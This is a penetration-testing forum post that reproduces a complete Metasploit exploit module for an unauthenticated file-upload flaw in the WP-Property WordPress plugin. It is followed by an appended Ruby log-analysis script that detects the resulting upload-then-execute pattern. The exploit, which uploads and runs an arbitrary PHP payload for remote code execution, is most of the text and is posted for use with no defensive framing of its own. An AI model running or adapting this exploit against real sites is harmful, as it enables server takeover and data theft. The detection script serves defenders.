China Network Penetration Testing Alliance

Title: WordPress WP-Property PHP File Upload Vulnerability

Author: admin    Time: 2013-1-4 19:51
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def check
    uri =  target_uri.path
    uri << '/' if uri[-1,1] != '/'

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
    })

    if not res or res.code != 200
      return Exploit::CheckCode::Unknown
    end

    return Exploit::CheckCode::Appears
  end

  def exploit
    uri =  target_uri.path
    uri << '/' if uri[-1,1] != '/'

    peer = "#{rhost}:#{rport}"

    @payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    if not res or res.code != 200 or res.body !~ /#{@payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    upload_uri = res.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    res = send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end
end
Don't ask me what this is or how to use it; all I'm saying is msf.
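For defenders, the module above leaves a recognisable trace: a successful POST to uploadify.php followed by a request for a new .php file in the same uploadify directory. The following is an added example, not part of the original post or of Metasploit, that finds this pattern in a web access log. It assumes the Apache/nginx "combined" log format; the function name find_upload_exec and the sample log lines are constructed for illustration.

```ruby
# Added example (not from the original post): find the upload-then-request
# pattern against the WP-Property uploadify directory in an access log.
UPLOADIFY_DIR = %r{/wp-content/plugins/wp-property/third-party/uploadify/}
# Assumption: Apache/nginx "combined" log format.
LOG_LINE = /\A(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<method>[A-Z]+) (?<path>\S+) [^"]*" (?<status>\d{3}) /

# Constructed sample lines (documentation IP ranges, made-up file name).
SAMPLE_LOG = <<~LOG
  198.51.100.7 - - [04/Jan/2013:19:40:01 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php HTTP/1.1" 200 0 "-" "-"
  198.51.100.7 - - [04/Jan/2013:19:40:02 +0800] "POST /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php HTTP/1.1" 200 71 "-" "-"
  198.51.100.7 - - [04/Jan/2013:19:40:03 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/AbCdE.php HTTP/1.1" 200 0 "-" "-"
  203.0.113.20 - - [04/Jan/2013:19:41:10 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.css HTTP/1.1" 200 512 "-" "-"
  203.0.113.20 - - [04/Jan/2013:19:42:00 +0800] "POST /wordpress/wp-login.php HTTP/1.1" 302 0 "-" "-"
LOG

# Returns one hash per suspicious request, in log order.
def find_upload_exec(log_text)
  uploaders = {} # client IP => true once it has POSTed to uploadify.php
  findings = []
  log_text.each_line do |line|
    m = LOG_LINE.match(line)
    next unless m
    path = m[:path].split('?', 2).first
    next unless path.match?(UPLOADIFY_DIR)
    file = File.basename(path)
    if m[:method] == 'POST' && file == 'uploadify.php' && m[:status] == '200'
      # Unauthenticated upload endpoint accepted a request.
      uploaders[m[:ip]] = true
      findings << { ip: m[:ip], ts: m[:ts], kind: :upload, path: path }
    elsif file != 'uploadify.php' && file.match?(/\.(php\d?|phtml)\z/i)
      # Any other PHP file in this directory is not part of the plugin's normal traffic.
      kind = uploaders[m[:ip]] ? :exec_after_upload : :php_in_upload_dir
      findings << { ip: m[:ip], ts: m[:ts], kind: kind, path: path }
    end
  end
  findings
end

if __FILE__ == $PROGRAM_NAME
  find_upload_exec(SAMPLE_LOG).each { |f| puts f.values_at(:ts, :ip, :kind, :path).join(' ') }
end
```

Because the module requests its payload with :unlink_self set, the uploaded file may no longer be on disk by the time the host is examined, so the access log is often the more reliable evidence.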

Welcome to China Network Penetration Testing Alliance (https://cobjon.com/) Powered by Discuz! X3.2